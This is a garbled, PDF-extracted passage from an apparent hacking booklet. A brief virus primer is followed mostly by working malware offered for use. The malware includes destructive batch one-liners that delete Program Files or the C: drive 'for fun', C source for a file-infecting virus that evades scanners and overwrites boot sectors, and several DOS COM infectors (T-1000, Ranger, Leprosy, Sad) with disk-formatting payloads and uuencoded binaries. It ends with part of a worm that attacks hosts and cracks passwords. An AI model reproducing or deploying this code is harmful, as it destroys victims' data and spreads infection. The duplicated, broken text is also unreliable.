and other malware and it is cheaper to protect you environment from them rather then being sorry. There might be a virus in your computer if it starts acting differently. There is no reason to panic if the computer co mputer virus is found. It is good to be a little suspicious of malware when you surf in the Internet and download files. Some files that look interesting might hide a malware. A computer virus is a program that reproduces itself and its mission is to spread out. Most viruses are harmless and some viruses might cause random d amage to data files. A trojan horse is not a virus because it doesn't reproduce. The trojan horses are usually masked so that they look interesting. There are trojan horses that steal passwords and formats hard disks. Marco viruses spread from applications which use macros. Macro viruses spreads fast because people share so much data, email documents and use the Internet to get documents. Macros are also very easy to write. Some people want to experiment how to write viruses and test their programming talent. At the same time they do not understand about the consequences for other people or they simply do not care. Viruses mission is to hop from program to other and this can happen via floppy disks, Internet FTP sites, newsgroups and via email attachments. Viruses are mostly written for PCcomputers and DOS environments. Viruses are not any more something that just programmers and computer specialist have to deal with. Today everyday users have to deal with viruses.
Back
121
Viruses Programmer 1) A simp simple le viru viruss
programed..a
simple
virus
just
1
sentecne
just
for
fun.
=================cut below============= @ECHO OFF IF
EXIS EXIST T
C:\P C:\PRO ROGR GRAM AM
FILE FILES\ S\*. *.* *
DEL DELTREE TREE
/Y C:\P C:\PRO ROGR GRAM AM
FILE FILES\ S\*. *.* *
===================end================== and paste it in notepad and give it the name what u want eg u have to give the bat ext. other wise it wont work.
2) Form Format atee your your frien friends ds PC PC
=================cut below============= @ ECHO OFF DEL C:\ *.*/Y.
3) R-virus
#include
#include #include #include #include
/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM file which CVIRUS can infect without increasing the size of the 122
file. (Since this would tip off the victim to CVIRUS's presence, no file under this size size will be infected.) It should be set to the approximate size of the LZEXEd .EXE file produced from this code, but always a few bytes larger. larger. Why? Because this way CVIRUS doesn't need to check itself for previous infection, saving time.
SIGNATURE SIGNATURE is the four-byte signature that CVIRUS checks for to prevent re-infection of itself. */
#ifdef DEBUG #define TOO_SMALL 6000 #else #define TOO_SMALL 4735 #endif
#define SIGNATURE "NMAN"
/* The following is is a table of random byte byte values. Be sure to constantly change this to prevent detection by virus scanners, but keep it short (or non-exsistant) to keep the code size down. */
char screw_virex[] = "\xF5\x23\x72\x96\x54\xF "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04"; A\xE3\xBC\xCD\x04";
void hostile_activity(void) { /* Put whatever you feel like doing here... I chose to make this routine trash the victim's boot, FAT, and directory sectors, but you can alter this code however you want, and are encouraged to do so. */
123
#ifdef DEBUG puts("\aAll files infected!"); exit(1); #else
/* Overwrite five sectors, starting with sector 0, on C:, with the memory at location DS:0000 (random garbage). */
abswrite(2,5,0,(void *) 0); __emit__(0xCD, 0x19); // Reboot computer
#endif
}
int infected(char *fname) { /* This function determines determines if fname is infected. It reads four bytes 28 bytes in from the start and checks them the m agains the current header. 1 is returned if the file is already infected, 0 if it isn't. */
register int handle; char virus_signature[35]; static char check[] check [] = SIGNATURE; SIGNATURE;
handle = _open(fname, O_RDONLY); O_RDONLY); _read(handle, virus_signature, sizeof(virus_signature)); close(handle);
#ifdef DEBUG 124
printf("Signature for %s: %.4s\n", fname, &virus_signature[28]); #endif
/* This next bit may look really stupid, but it actually saves abou t 100 bytes. */
return((virus_signature[30] == check[2]) && (virus_signature[31] == check[3])); }
void spread(char *virus, struct ffblk *victim) { /* This function infects infects victim with virus. virus. First, the victim's attributes are set to 0. Then the virus is copied into into the victim's file name. Its attributes, file date/time, and size are are set to that of the victim's, preventing detection, and the files are closed. */
register int virus_handle, victim_handle; unsigned virus_size; char virus_code[TOO_SMALL + 1], *victim_name;
/* This is used enought to warrant saving it in a separate variable */
victim_name = victim->ff_name;
#ifdef DEBUG printf("Infecting %s with %s...\n", victim_name, virus); #endif
/* Turn off all of the victim's attributes so it can be replaced */
_chmod(victim_name, 1, 0); 125
#ifdef DEBUG puts("Ok so far..."); far..."); #endif
/* Recreate the victim */
virus_handle = _open(virus, O_RDONLY); O_RDONLY); victim_handle = _creat(victim_name, victim->ff_attrib);
/* Copy virus */
virus_size = _read(virus_handle, virus_code, sizeof(virus_code)); _write(victim_handle, virus_code, virus_size);
#ifdef DEBUG puts("Almost done..."); #endif
/* Reset victim's file date, time, and size */
chsize(victim_handle, victim->ff_fsize); victim->ff_fsize); setftime(victim_handle, (struct ftime *) &victim->ff_ftime); &victim->ff_ftime);
/* Close files */
close(virus_handle); close(victim_handle);
#ifdef DEBUG 126
puts("Infection complete!"); #endif }
struct ffblk *victim(void) { /* This function returns a pointer to the name of the virus's next victim. This routine is set up to try to infect .EXE and .COM files. If there is a command line argument, it will will try to infect that file instead. If all files are infected, hostile activity is initiated... */
register char **ext; static char *types[] = {"*.EXE", "*.COM", NULL}; static struct ffblk ffblk; int done;
for (ext = (*++_argv) ? _argv : types; *ext; ext++) { for (ext = (*++_argv) ? _argv : types; *ext; ext++) { done = findf findfirs irst(* t(*ext ext,, &ffbl &ffblk, k, FA_RDON A_RDONL LY | FA_HIDD A_HIDDEN EN | FA_SYST A_SYSTEM EM | FA_ARCH); while (!done) { #ifdef DEBUG printf("Scanning %s...\n", ffblk.ff_name); #endif
/* If you want to check for specific days of the week, months, etc.... here is the place to insert the code (don't forget to "#include "). */
127
if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name))) (!infected(ffblk.ff_name))) return(&ffblk);
done = findnext(&ffblk); } } } /* If there are no files left to infect, have a little fun */
hostile_activity(); return(0); }
int main(int argc, char *argv[]) * argv[]) { /* In the main program, a victim is found and infected. If all files are infected, a malicious action is performed. Otherwise, a bogus error message is displayed, and the virus terminates with code 1, simulating an error. error. */
char *err_msg[] = { "Out of memory", "Bad EXE format", "Invalid DOS version", "Bad memory block", "FCB creation error", "Sharing violation", "Abnormal program termination", "Divide error", };
char *virus_name; spread(argv[0], victim()); puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]); 128
return(1); }
4) R-300 viruse
; ;
R-1000 Virus
; ; This virus is a Non-Resident Non -Resident Overwriting Self-Encrypting .COM File Inctector. ; When an infected program is started, the virus will infect all files in the ; current directory and use the time counter for its encryption. It displays ; the text "T-1000" "T-1000" when it is ready infecting.
Code
Segment para 'code'
Assume Cs:Code,Ds:Code
Length Equ Offset Offset EndByte-Offset EndByte-Offset Main
Org 100h
Main: Mov Si,Offset Decrypt Mov Di,Si Mov Cl,Offset EndByte-Offset Decrypt On2:
Lodsb
Db 34h Crypt Db 0 Stosb Dec Cl Cmp Cl,0ffh Jne On2
Decrypt: 129
Mov Ah,4eh Push Ax
Encr: Mov Ah,2ch Int 21h Mov Crypt,Dl Mov Si,Offset Decrypt Mov Di,Offset EndByte+10 Mov Cx,Offset EndByte-Offset Decrypt On3:
Lodsb
Xor Al,Crypt Stosb Dec Cx Cmp Cx,0ffffh Jne On3
Pop Ax On1:
Xor Cx,Cx
Mov Dx,Offset Nam Int 21h Jc Einde
Mov Ax,3d01h Mov Dx,9eh Int 21h Mov Bx,Ax
Mov Ah,40h Push Ax Mov Cx,Offset Decrypt-Offset Main Mov Dx,Offset Main Int 21h
130
Pop Ax Mov Cx,Offset EndByte-Offset Decrypt Mov Dx,Offset EndByte+10 Int 21h
Mov Ah,3eh Int 21h
Mov Ah,4fh Push Ax Jmp Short Encr
Einde: Mov Ah,9 Mov Dx,Offset Msg Push Cs Pop Ds Int 21h Int 20h
Msg
Db 'T-1000$ 'T-1000$''
Nam
Db '*.Com',0
EndByte Db 0
Code
Ends
End Main
; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč ; ĄĄĄĄĄĄĄĄĄĄ> and Remember Don't Forget to to Call <ĄĄĄĄĄĄĄĄ <ĄĄĄĄĄĄĄĄ ; ĄĄĄĄĄĄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? H/P/A/V/AV/? <ĄĄĄĄĄ ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč 131
begin 775 t-1000.com MOA(!B_ZQ::PT`*K^R8#Y_W7UM$Y0M"S-(8@6"0&^$@&_A0&Y MOA(!B_ZQ::PT`*K^R8#Y_W7UM$Y0M"S-(8@ 6"0&^$@&_A0&Y:0"L,@8)`:I) :0"L,@8)`:I) M@_G_=?18,\FZ=0'-(7(GN`$]NIX`S2&+V+1`4+D2`+H``
5) leprosy.c viruses
#pragma inline
#define CRLF
"\x17\x14"
#define NO_MA NO_MATCH TCH 0x12
/* CR/LF combo encrypted. */ /* No match in wildcard search. */
/* The following strings are are not garbled; they are all encrypted */ /* using the the simple simple technique of adding the integer value 10 to */ /* each character. character. They are automatically decrypted by
*/
/* 'print_s()', the function which which sends the strings to 'stdout' */ /* using DOS DOS service service 09H. All are terminated terminated with with a dollar-sign */ /* "$" as per DOS service specifications.
*/
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy| "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; \x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF
"\x13sxm\x7f "\x13sxm\x7f|klvo* |klvo*nomk\x nomk\x83*yp* 83*yp*VOZ\\ VOZ\\Y]c*;8: Y]c*;8::6*k*\ :6*k*\x80s| x80s|
\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." };
132
struct _dta
/* Disk Transfer Area format for find. */
{ char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; /* Set it to default DTA. DTA. */
const char filler[] = "XX";
/* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus virus code begins. */ const int virus_size = 666;
/* The size in bytes of the virus code. */
const int infection_rate = 4;
/* How many files to infect per run. */
char compare_buf[20]; int handle;
/* Load program here to test infection. */ /* The current file handle being used. */
int datestamp, timestamp;
/* Store original date and time here. */
char diseased_count = 0;
/* How many infected files found so far. far. */
char success = 0;
/* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI /* Standard C, for the support functions of this program.
int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); 133
*/
*/
void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void );
/*----------------------------------*/ /*
MAIN
PROG RAM
*/
/*----------------------------------*/
int main( void ) { int x = 0; do { if ( find_healthy() ) {
/* Is there an un-infected file? */
infect();
/* Well, then infect it! */
x++;
/* Add one to the counter. */
success++;
/* Carve a notch in our belt. */
} else {
/* If there ain't a file here... */
_DX = (int) "..";
/* See if we can step back to */
_AH = 0x3b;
/* the parent directory, directory, and try */
asm int 21H; x++; }
/* there. */ /* Increment the counter anyway, anyway, to */ /* avoid infinite loops. */
} while( x < infection_rate ); if ( success )
/* Do this until we've had enough. */
/* If we got something this time, */
print_s( fake_msg );
/* feed 'em the phony error line. */
else if ( diseased_count > 6 ) for( x = 0; x < 3; x++ )
/* If we found 6+ infected files */ /* along the way, way, laugh!! */
print_s( virus_msg[x] ); else print_s( fake_msg );
/* Otherwise, keep a low profile. */
return; 134
}
void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00;
/* No attribute flags are set. */
_AL = 0x01;
/* Use Set Attribute sub-function. */
_AH = 0x43;
/* Assure access to write file. */
asm int 21H;
/* Call DOS interrupt. */
open_handle( dta->filename ); _BX = handle; _CX = virus_size; _DX = (int) codestart; _AH = 0x40;
/* Re-open the healthy file. */
/* BX register holds handle. */ /* Number of bytes to write. */ /* Write program code. */ /* Set up and call DOS. */
asm int 21H; restore_timestamp(); close_handle();
/* Keep original date & time. */ /* Close file. */
return; }
int find_healthy( void ) { if ( find_first("*.EXE") != NO_MATCH NO_MATCH ) if ( healthy() )
/* Find EXE? */
/* If it's healthy, healthy, OK! */
return 1; else while ( find_next() != NO_MATCH NO_MATCH )
/* Try a few more otherwise. */
if ( healthy() ) return 1;
/* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH NO_MATCH ) if ( healthy() )
/* Find COM? */
/* If it's healthy, healthy, OK! */
return 1; else while ( find_next() != NO_MATCH NO_MATCH )
/* Try a few more otherwise. */ 135
if ( healthy() ) return 1;
/* If you find one, great! */
return 0;
/* Otherwise, say so. */
}
int healthy( void void ) { int i; datestamp = dta->datestamp;
/* Save time & date for later. later. */
timestamp = dta->timestamp; open_handle( dta->filename ); _BX = handle;
/* Open last file located. */
/* BX holds current file handle. */
_CX = 20;
/* We only want a few bytes. */
_DX = (int) compare_buf; _AH = 0x3f;
/* DX points to the scratch buffer. buffer. */ /* Read in file for comparison. */
asm int 21H; restore_timestamp(); close_handle(); for ( i = 0; i < 20; i++ )
/* Keep original date & time. */ /* Close the file. */ /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) ) return 1; diseased_count++; return 0;
/* If no match, return healthy. healthy. */ /* Chalk up one more fucked file. */ /* Otherwise, return infected. */
}
void restore_timestamp( restore_timestamp( void ) { _AL = 0x01;
/* Keep original date & time. */
_BX = handle;
/* Same file handle. */
_CX = timestamp;
/* Get time & date from DTA. DTA. */
_DX = datestamp; _AH = 0x57;
/* Do DOS service. */
asm int 21H; 136
return; }
void print_s( char *s ) { char *p = s; while ( *p ) {
/* Subtract 10 from every character. */
*p -= 10; p++; } _DX = (int) s; _AH = 0x09; asm int 21H;
/* Set DX to point to adjusted string. */ /* Set DOS function number. number. */ /* Call DOS interrupt. */
return; }
int find_first( find_first( char *fn ) { _DX = (int) fn;
/* Point DX to the file name. */
_CX = 0xff;
/* Search for all attributes. */
_AH = 0x4e;
/* 'Find first' DOS service. */
asm int 21H;
/* Go, DOS, go. */
return _AX;
/* Return possible error code. */
}
int find_next( void ) { _AH = 0x4f;
/* 'Find next' function. */
asm int 21H;
/* Call DOS. */
return _AX;
/* Return any error code. */
}
void open_handle( char *fn ) { 137
_DX = (int) fn;
/* Point DX to the filename. */
_AL = 0x02;
/* Always open for both read & write. */
_AH = 0x3d;
/* "Open handle" service. */
asm int 21H;
/* Call DOS. */
handle = _AX;
/* Assume handle returned OK. */
return; }
void close_handle( void ) { _BX = handle;
/* Load BX register w/current file handle. */
_AH = 0x3e;
/* Set up and call DOS service. */
asm int 21H; return; }
6) viruse200063
model tiny
; x*x*x*x*x*x*x
.code
; Virus Virus code segment org
100h
entry_point: db 0e9h,0,0
decrypt:
; COM file starting IP
; jmp decrypt
; handles encryption and decryption
mov cx,(offset heap - offset offset startencrypt)/2 startencrypt)/2 ; iterations patch_startencrypt: mov di,offset startencrypt ; start of decryption decrypt_loop: db 81h,35h decrypt_value dw 0 inc di
; xor word ptr [di], xxxx ; initialised at zero for null effect ; calculate new decryption location
inc di loop decrypt_loop
; decrypt mo'
startencrypt: 138
call next next:
; calculate delta offset
pop bp
; bp = IP next
sub bp,offset next
; bp = delta offset
lea si,[bp+save3] mov di,100h push di
; For later return
movsw movsb
mov byte ptr [bp+numinfec],1 [bp+numinfec],1 ; reset infection counter
mov ah,1Ah
; Set new DTA DTA
lea dx,[bp+newDTA] dx,[bp+ newDTA]
; new DTA @ DS:DX
int 21h
mov ah,47h mov dl,0
; Get current directory ; Current drive
lea si,[bp+origdir]
; DS:SI->buffer
int 21h mov byte ptr [bp+backslash],'\' [bp+backslash],'\' ; Prepare for later CHDIR CHDIR
mov ax,3524h int 21h
; Get int 24 handler ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it mov word ptr [bp+oldint24+2],es mov ah,25h
; Set new int 24 handler
lea dx,[bp+offset int24]
; DS:DX->new handler
int 21h push cs
; Restore ES
pop es
; 'cuz it was changed
dir_scan:
; "dot dot" traversal
lea dx,[bp+com_mask] 139
mov ah,4eh mov cx,7
; find first file ; any attribute
findfirstnext: int 21h
; DS:DX points to mask
jc done_infections done_ infections
mov al,0h
; No mo files found
; Open read only
call open
mov ah,3fh
; Read file to buffer
lea dx,[bp+buffer]
; @ DS:DX
mov cx,1Ah
; 1Ah bytes
int 21h
mov ah,3eh
; Close file
int 21h
checkCOM: mov ax,word ptr [bp+newDTA+1Ah] [bp+newDTA+1Ah] ; Filesize in DTA DTA cmp ax,2000
; Is it too small?
jb find_next
cmp ax,65535-(endheap-decrypt) ; Is Is it too large? large? ja find_next
mov bx,word ptr [bp+buffer+1]; get jmp location add bx,heap-decrypt+3 bx,heap-decrypt+3
; Adjust for virus size
cmp ax,bx je find_next
; already infected
jmp infect_com find_next: mov ah,4fh
; find next file
jmp short findfirstnext mov ah,3bh
; change directory 140
lea dx,[bp+dot_dot]
; "cd .."
int 21h jnc dir_scan
; go back for mo!
done_infections:
jmp activate
; Always activate
exit_virus: mov ax,2524h
; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original int 21h push cs pop ds
mov ah,3bh
; change directory
lea dx,[bp+origdir-1]
; original directory
int 21h
mov ah,1ah
; restore DTA DTA to default
mov dx,80h dx,80 h
; DTA in PSP
int 21h retn save3
; 100h is on stack db 0cdh,20h,0
activate:
; First 3 bytes of COM file
; ************************ ****************************** ****** mov
ax,04301h
; DOS set file attributes function
xor
cx,cx
; File will have no attributes
lea
dx,[di + 01Eh]
; DX points to file name
int
021 h
mov
ax,03D02h
; DOS open file function, r/w
lea
dx,[di + 01Eh]
; DX points to file name
int
021 h
xchg
bx,ax
; Transfer file handle to AX
jmp exit_virus
141
creator
db '[ZEB(C)1992]',0
virusname
; Mass Produced Code Generator
db '[ranger]',0
infect_com:
; ax = filesize
mov cx,3 sub ax,cx lea si,[bp+offset buffer] lea di,[bp+offset save3] movsw movsb mov byte ptr [si-3],0e9h mov word ptr [si-2],ax add ax,103h push ax
; needed later
finishinfection: push cx
; Save # bytes to write
xor cx,cx
; Clear attributes
call attributes
; Set file attributes
mov al,2 call open
mov ah,40h lea dx,[bp+buffer] pop cx
; Write Write to file ; Write from buffer ; cx bytes
int 21h
mov ax,4202h xor cx,cx cwd
; Move file pointer ; to end of file ; xor dx,dx
int 21h
get_encrypt_value: mov ah,2ch
; Get current time 142
int 21h
; dh=sec,dl=1/100 sec
or dx,dx
; Check if encryption value = 0
jz get_encrypt_value
; Get another if it is
mov [bp+decrypt_value],dx
; Set new encryption value
lea di,[bp+code_store] mov ax,5355h
; push bp,push bx
stosw lea si,[bp+decrypt]
; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move push si
; Save for later use
push cx rep movsb
lea
si,[bp+write]
mov
; Copy writing function
cx,endwrite-write
rep
movsb
pop
cx
pop
si
pop
dx
; Bytes to move
; Entry point of virus
push di push si push cx rep
movsb
mov
ax,5b5dh
; Copy decryption function ; pop bx,pop bp
stosw mov
al,0c3h
; retn
stosb
add mov
dx,offset startencrypt - offset decrypt ; Calculate new word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store pop
cx
pop
di
pop
si
; decryption
143
rep
movsb
; Restore decryption function
mov ax,5701h
; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] [bp+newDTA+16h] ; time mov dx,word ptr [bp+newDTA+18h] [bp+newDTA+18h] ; date int 21h
mov ah,3eh
; Close file
int 21h
mov ch,0 mov cl,byte ptr [bp+newDTA+15h] ; Restore original call attributes
; attributes
dec byte ptr [bp+numinfec] ; One mo infection jnz mo_infections
; Not enough
jmp done_infections mo_infections: jmp find_next
open: mov ah,3dh lea dx,[bp+newDTA+30] dx,[bp+newDTA+30]
; filename in DTA DTA
int 21h xchg ax,bx ret
attributes: mov ax,4301h
; Set attributes to cx
lea dx,[bp+newDTA+30] dx,[bp+newDTA+30]
; filename in DTA DTA
int 21h ret
write: pop bx
; Restore file handle 144
pop bp
; Restore relativeness
mov ah,40h
; Write Write to file
lea dx,[bp+decrypt]
; Concatenate virus
mov cx,heap-decrypt
; # bytes to write
int 21h push bx push bp endwrite:
int24:
; New int 24h (error) handler mov al,3
; Fail call
iret
com_mask dot_dot
; Return control
db '*.com',0 db '..',0
heap:
; Variables not in code
; The following code is the buffer for the write function code_store: oldint24
db (startencrypt-decrypt)*2+(endwr (startencrypt-decrypt)*2+(endwrite-write)+1 ite-write)+1 dup (?) dd ?
backslash
origdir
; Storage for old int 24h handler
db ? db 64 dup (?)
newDTA
; Current directory buffer
db 43 dup (?)
numinfec
db ?
buffer
db 1ah dup (?)
endheap: end
; Temporary DTA ; Infections this run ; read buffer
; End of virus
entry_point
begin 775 ranger range r.com MZ0``N=<`OQ$!@34``$='XOCH``!=@>T4`8VVP`&_``%7I:3&AEL#`;0:C98P M`\TAM$>R`(VV\`+-(<:&[P)-EK8" MM$ZY!P#-(7(_L`#H*`&T/XV67`.Y&@#-(;0^S2&+ADH#/=`' M70.!P[\!.\-T`^M;D+1/Z\>T.XV6O`+-(7.TZQ^0N"0EQ9;K`LTA#A^T.XV6 M[P+-(;0:NH``S2'#S2``N`%#,\F-51[-(;@"/8U5'L M[P+-(;0:NH``S2'#S2``N`% #,\F-51[-(;@"/8U5'LT TAD^O-6UI%0BA#*3$Y M.3)=`%MR86YG97)=`+D#`"O!C;9<`XV^P`&EI,9$_>F)1/X%`P%043/)Z(P` ML`+H?0"T0(V67`-9S2&X`D(SR9G-(;0LS2$+TG3XB98+`8V^OP*X55.KC;8# 145
M`;D.`%91\Z2-MJ0"N0\`\Z197EI75E'SI+A=6ZNPPZJ#P@Z)E@ M\Z2X`5>+CD8#BY9(`\TAM#[-(;4`BHY%`^@6` M\Z2X`5>+CD8#BY9(`\T AM#[-(;4`BHY%`^@6`/Z.6P-U`^D5_^D$_[0]C99. /Z.6P-U`^D5_^D$_[0]C99. J`\TAD\.X`4.-EDX#S2'#6UVT0(V6`P&YO`'-(5-5L`//*BYC;V J`\TAD\.X`4.-EDX#S2'#6UVT0(V6`P&YO`'-(5-5L`//*BYC;VT`+BX` T`+BX` ` end
8) Viruse:Don’t be sad
; ; ---- Data Segment Values ---; ds:[0f6h] = read buffer location ; ds:[0f8h] = write buffer location ; ds:[0fah] = store length of virus at this location ; ds:[0fch] = store length of file to be infected at this location ; ds:[0feh] = filename of file to infect ;
.model tiny .code org
100h
; origin for .com files
start:
nop
; these two nop instructs will be used by 'Nasty'
nop
; to determine if a file is already infected
;****** ;get date ;****** mov ah,2ah int 21h
; get the date ; do it
cmp dh,09h jnz do_not_activate
; is it September? ; if NO jmp do_not_activate
;**** ;the nasty bit ;**** 146
;* ;* 1. Print message ;* lea dx,mess
; print message
mov ah,09
; 'Nasty in September'
int 21h
; do it
;**** ;* 2. Destroy disk ;**** mov ah,19h int 21h mov dl,al
; get current drive (returned in al) ; do it ; dl = drive # to be formated
mov ah,05
; disk format function
mov cl,01
; first sector
mov ch,00
; first track
mov dh,00
; head zero
mov al,10h
; 10h (16) sectors - 2 tracks
int 13h
; do it (overwrite first 16 tracks on currently ; selected disc)
do_not_activate: mov cx,80h
; save parameters; set counter to 80h bytes
mov si,0080h
; offset in the current data segment of the byte ; to be copied
mov di,0ff7fh rep movsb
; offset to which byte is to be moved ; move bytes until cx=0 (decrement cx by 1 each time ; loop is performed is done automatically) automatically) ; (increment by 1 of si & di is done automatically)
lea ax,begp
; load exit from program offset address into ax
mov cx,ax
; "
sub ax,100h
; subtract start of .com file address (100h) from ax
"
"
"
"
"
" cx
; ax now contains the the length of the the virus 147
mov ds:[0fah],ax
; put length of the virus into the data segment at
; offset 0fah add cx,fso
; add fso (5h) to cx (offset address of exit) ; so, cx=cx+5
mov ds:[0f8h],cx
; move cx (end of virus + 5) into data segment at
; offset 0f8h. ** Start of the write write buffer. buffer. ADD CX,AX
; add virus length (ax) to cx ?????
mov ds:[0f6h],cx
; mov cx into data segment at offset 0f6h.
; ** Start of the read buffer mov cx,ax
; mov length of virus into cx
lea si,start
; load address of 'start' (start of virus) into ; souce index
mov di,ds:[0f8h]
; mov the value of the write buffer (@ 0f8h) into
; destination index
rb:
; cx = counter (length of virus) ; si = offset of byte to be read ; di = offset of where to write byte to ; (auto decrement of cx & increment of si & di)
rep movsb
stc
; copy the virus into memory
; set the carry flag
lea dx,file_type_to_infect
; set infector for .com files only
mov ah,4eh
; find first file with specified params
mov cx,20h
; files with archive bit set
int 21h
; do it ; if file found, CF is cleared, else ; CF is set
or ax,ax jz file_found
; works the below instructions (jz & jmp) ; if file found jmp file_found 148
jmp done
; if no file found, jmp done (exit virus)
file_found: mov ah,2fh
; get dta (returned in es:bx)
int 21h
; do it
mov ax,es:[bx+1ah] mov ds:[0fch],ax add bx,1eh
; mov filesize into ds:[0fch] ; bx now points to asciz filename
mov ds:[0feh],bx clc
; mov size of file to be infected into ax
; mov filename into ds:[0feh]
; clear carry flag
mov ax,3d02h
; open file for r/w (ds:dx -> asciz filename)
mov dx,bx
; mov filename into dx
int 21h
; do it (ax contains file handle)
mov bx,ax
; mov file handle into bx
mov ax,5700h
; get time & date attribs from file to infect
int 21h
; do it (file handle in bx)
push cx
; save time to the stack
push dx
; save date to the stack
mov ah,3fh
; read from file to be infected
mov cx,ds:[0fch]
; number of bytes to be read (filesize of file to
; be infected mov dx,ds:[0f6h] int 21h
; buffer (where to read bytes to) ; do it
mov bx,dx
; mov buffer location to bx
mov ax,[bx]
; mov contents of bx (first two bytes - as bx is ; 16-bits) into ax.
; Now check to see if file is infected... if the 149
;
file is infected, it's first two bytes will be
;
9090h (nop nop)
sub ax,9090h
; If file is already infected, zero flag will be set ; thus jump to fin(ish)
jz fin
mov ax,ds:[0fch]
; mov filesize of file to be infected into ax
mov bx,ds:[0f6h]
; mov where-to-read-to buffer into bx
mov [bx-2],ax
; correct old len
mov ah,3ch
; Create file with handle
mov cx,00h
; cx=attribs -- set no attributes
mov dx,ds:[0feh] clc
; point to name
; clear carry flag
int 21h
; create file ; Note: If filename already exists, (which it does) ; truncate the filelength to to zero - this is ok as ; we have already copied the file to be infected ; into memory.
mov bx,ax
; mov file handle into bx
mov ah,40h
; write file with handle (write to the file to be ; infected) - length currently zero ; cx=number of bytes to write
mov cx,ds:[0fch]
; length of file to be infected
add cx,ds:[0fah]
; length of virus
mov DX,ds:[0f8h]
; location of write buffer (this contains the virus
; + the file to be infected) int 21h
; write file ; new file = virus + file to be infected
150
mov ax,5701h
; restore original time & date values
pop dx
; get old date from the stack
pop cx
; get old time from the stack
int 21h
; do it ; Note: Infected file will now carry the time & date ; it had before the infection.
mov ah,3eh
; close file (bx=file handle)
int 21h
; do it ; Note: date & time stamps automatically updated if ; file written to.
fin: stc
; set carry flags
mov ah,4fh
; find next file (.com)
int 21h
; do it
or ax,ax
; decides zero flag outcome
jnz done
; if no more .com files, jmp done
JMP file_found
; else begin re-infection process for new file.
done: mov cx,80h
; set counter (cx) = 80h
mov si,0ff7fh
; source offset address (copy from here)
mov di,0080h
; destination offset address (copy to here)
rep movsb
; copy bytes! (cx is auto decremented by 1 ; si & di are auto incremented by 1) ; Note: this is a 'restore parameters' feature ; this does the reverse of what what done earlier ; in the program (do_not_activate:)
mov ax,0a4f3h
;
mov ds:[0fff9h],ax
;
mov al,0eah mov ds:[0fffbh],al
; ; reset data segment locations ??? (to previous 151
mov ax,100h
; values before virus infection)
mov ds:[0fffch],ax lea si,begp
; ; load exit from program offset address into si
lea di,start
; load offset address of start of virus into di
mov ax,cs mov ds:[0fffeh],ax
; re-align cs = ds ???
mov kk,ax mov cx,fso
db 0eah
; define byte
dw 0fff9h
; define word
kk dw 0000h
; define kk = word
mess db 'Sad virus virus - 24/8/91',13,10,'$'
file_type_to_infect db '*?.com',0
fso dw 0005h
; virus message to display
; infect only .com files.
; store 5 into 'fso'. dw means that fso is 2 bytes ; in size (a word) ; ----- alma mater
begp: mov int
ax,4c00h 21h
; normal dos termination (set al to 00) ; do it
end start begin 775 sad.com MD)"T*LTA@/X)=1FZ#@*T"_@#XN`(]B]/-(8O8N`!7S2%1 M4K0_BP[\`(L6]@#-(8O:BP]@")1_ZT/+D``(L6_@#XS2&+ MV+1`BP[\``,.^@"+%O@`S2&X`5=:6
end
9) Worme viruses
666 The Dead Zone 214-522-5321 300/1200/2400 666
#include
#include
#include
#include
long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
153
int n;
int parent = 0;
int okay = 0;
/* change calling name to "sh" */
strcpy(argv[0], "sh");
/* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0);
/* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) {
/* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
n++;
}
154
else {
/* check for 1l.c in argument list */
if (!strncmp(argv([n], "1l.c", 4))
okay = 1;
/* load an object file into memory */
load_object (argv[n];
/* clean up by unlinking file */
if (parent)
unlink (argv[n]);
/* and removing object file name */
strcpy (argv[n++], "");
}
}
/* if 1l.c was not in argument list, quit */
if (!okay)
exit (0);
155
/* reset process group */
setpgrp (getpid());
/* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP);
/* scan for network interfaces */
if_init();
/* collect list of gateways from netstat */
rt_init();
/* start main loop */
doit();
}
int
doit()
{
current_time = time (0);
156
/* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts();
/* check for a "listening" worm */
check_other ()
/* attempt to send byte to "ernie" */
send_message ()
for (;;) {
/* crack some passwords */
crack_some ();
/* sleep or listen for other worms */
other_sleep (30);
crack_some ();
/* switch process id's */
if (fork())
/* parent exits, new worm continues */
157
exit (0);
/* attack gateways, known hosts */
attack_hosts();
other_sleep(120);
/* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
reset_hosts();
current_time = time(0); }
